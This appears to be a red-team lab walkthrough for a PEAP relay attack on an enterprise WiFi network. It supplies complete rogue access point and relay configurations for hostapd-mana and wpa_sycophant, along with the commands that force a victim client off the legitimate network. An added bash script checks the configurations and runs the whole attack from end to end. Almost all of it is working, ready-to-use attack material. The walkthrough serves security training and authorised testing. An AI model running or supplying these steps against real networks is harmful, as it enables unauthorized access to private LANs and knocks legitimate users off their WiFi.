PEAP Relay

Pivoting over WiFi: PEAP Relay

Your Red Team is hired by Global Central Bank to test the security of their HQ. You are given the responsibility of assessing their WiFi network. The WiFi network might lead to the machines on their private LAN. Everything else is off-limits.

The network enforces PEAP-MSCHAPv2 with very strong user passwords, so capturing an MSCHAPv2 challenge/response with a rogue AP and cracking it offline is not feasible. Instead, a PEAP relay attack can be used to connect to the network: the victim's inner MSCHAPv2 exchange is relayed in real time to the legitimate network, so the password never has to be recovered. The relay depends on the client accepting the rogue AP's server certificate (no certificate validation, or a user who clicks through the warning) and on PEAP cryptobinding not being enforced.

// Set the wireless device into monitor mode. Note the interface roles used further down:
// wlan0 for hostapd-mana, wlan1 for the sycophant client and wlan2 for the deauth; adjust to your setup.
iw dev wlan0 set monitor none

Create a mana config file (hostapd-mana.conf) like the one below. Note: for this lab the certificates were already generated.

interface=wlan0
ssid=GlobalCentralBank
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
# mana-specific settings
# accept and log credentials for any identity
mana_wpe=1
# send EAP-Success regardless of whether the inner authentication succeeded
mana_eapsuccess=1
enable_mana=1
# hand the inner EAP exchange to wpa_sycophant via files in sycophant_dir
enable_sycophant=1
sycophant_dir=/tmp

You also need to create the hostapd.eap_user file as per below. The first line, with the * wildcard, lists the phase-1 (outer) methods offered to any identity; the second line, marked [2], lists the phase-2 (inner tunnel) methods. Combined with mana_wpe=1 this allows any user to connect, whatever credentials they present.

* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Start mana with the config file

hostapd-mana hostapd-mana.conf

Create the Sycophant config file (wpa_sycophant_example.conf) as per below:

network={
ssid="GlobalCentralBank"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
# Cryptobinding must stay disabled: it ties the inner and outer
# tunnels together and would cause the relayed session to fail.
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Dont want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=02:00:00:00:00:00
}

Then start Sycophant on a second interface (wlan1 here), pointing it at that config:

./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan1

Use aireplay-ng from the monitor-mode interface to deauthenticate the victim client (-c) from the legitimate AP (-a) so that it reconnects, this time to the rogue AP:

aireplay-ng -0 100 -a D2:E9:6A:D3:B3:50 -c 02:00:00:00:09:00 wlan2

In the hostapd-mana logs you can see the client connecting to the rogue AP.

Viewing the sycophant logs, you can see the connection being relayed and Sycophant then connecting to the legitimate network. Sycophant also runs dhclient to obtain an IP address, at which point you have a foothold on the LAN behind the WiFi.
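As an added example (not part of the original lab notes, and not code from the hostapd-mana or wpa_sycophant projects), the bash script below sanity-checks the two config files before the attack is launched and then wires the steps above together. The most common reasons a relay silently fails are an SSID mismatch between the two files, a bssid_blacklist that does not match the rogue AP's real BSSID (sycophant then connects back to you), or cryptobinding left enabled. Interface roles (wlan0 rogue AP, wlan1 sycophant, wlan2 injection), file paths and the run_relay wrapper are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example: pre-flight checks for a PEAP relay with hostapd-mana and
# wpa_sycophant. Interface names, paths and MACs are assumptions.

# Extract a "key=value" setting from a hostapd-style config, ignoring comments.
conf_get() {  # conf_get <file> <key>
    sed -n -E "s/^[[:space:]]*$2=(.*)$/\1/p" "$1" | head -n 1
}

# Extract a key from inside the wpa_supplicant network={} block.
# Strips surrounding double quotes (ssid="X" -> X).
supp_get() {  # supp_get <file> <key>
    sed -n -E "s/^[[:space:]]*$2=\"?([^\"]*)\"?[[:space:]]*$/\1/p" "$1" | head -n 1
}

# Verify the two configs describe one consistent relay:
#  - both target the same SSID,
#  - sycophant blacklists the rogue AP's own BSSID,
#  - mana has the sycophant bridge enabled and the handoff directory exists,
#  - cryptobinding is disabled on the sycophant side.
# Returns 0 when all checks pass, 1 otherwise; prints each failure to stderr.
check_relay_configs() {  # check_relay_configs <mana.conf> <sycophant.conf> <rogue_bssid>
    local mana="$1" syco="$2" rogue="$3" rc=0
    local mana_ssid syco_ssid blacklist
    mana_ssid=$(conf_get "$mana" ssid)
    syco_ssid=$(supp_get "$syco" ssid)
    if [ "$mana_ssid" != "$syco_ssid" ]; then
        echo "ssid mismatch: mana='$mana_ssid' sycophant='$syco_ssid'" >&2; rc=1
    fi
    blacklist=$(supp_get "$syco" bssid_blacklist | tr 'A-F' 'a-f')
    if [ "$blacklist" != "$(printf '%s' "$rogue" | tr 'A-F' 'a-f')" ]; then
        echo "bssid_blacklist '$blacklist' does not match rogue BSSID '$rogue'" >&2; rc=1
    fi
    if [ "$(conf_get "$mana" enable_sycophant)" != "1" ]; then
        echo "enable_sycophant is not 1 in $mana" >&2; rc=1
    fi
    if [ ! -d "$(conf_get "$mana" sycophant_dir)" ]; then
        echo "sycophant_dir does not exist" >&2; rc=1
    fi
    case "$(supp_get "$syco" phase1)" in
        *crypto_binding=0*) ;;
        *) echo "phase1 must contain crypto_binding=0" >&2; rc=1 ;;
    esac
    return $rc
}

# Run the relay end to end (assumed interface roles: wlan0 rogue AP,
# wlan1 sycophant client, wlan2 monitor interface for deauth injection).
run_relay() {  # run_relay <mana.conf> <sycophant.conf> <real_bssid> <victim_mac>
    local mana="$1" syco="$2" real_bssid="$3" victim="$4"
    local rogue_bssid
    rogue_bssid=$(cat /sys/class/net/wlan0/address)
    check_relay_configs "$mana" "$syco" "$rogue_bssid" || return 1
    ip link set wlan2 down && iw dev wlan2 set monitor none && ip link set wlan2 up
    hostapd-mana "$mana" > /tmp/mana.log 2>&1 &
    ./wpa_sycophant.sh -c "$syco" -i wlan1 > /tmp/sycophant.log 2>&1 &
    sleep 5
    # Kick the victim off the legitimate AP so it re-associates with ours.
    aireplay-ng -0 100 -a "$real_bssid" -c "$victim" wlan2
}

# Only launch the attack when explicitly asked ("./relay.sh run"), so the
# file can also be sourced for the checks alone.
if [ "${1:-}" = "run" ]; then
    run_relay /root/hostapd-mana.conf /root/wpa_sycophant_example.conf \
        D2:E9:6A:D3:B3:50 02:00:00:00:09:00
fi
```

Source the file and call check_relay_configs with the rogue adapter's MAC before starting anything; a non-zero exit with the printed reason is far cheaper to debug than a sycophant that associates with your own rogue AP.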
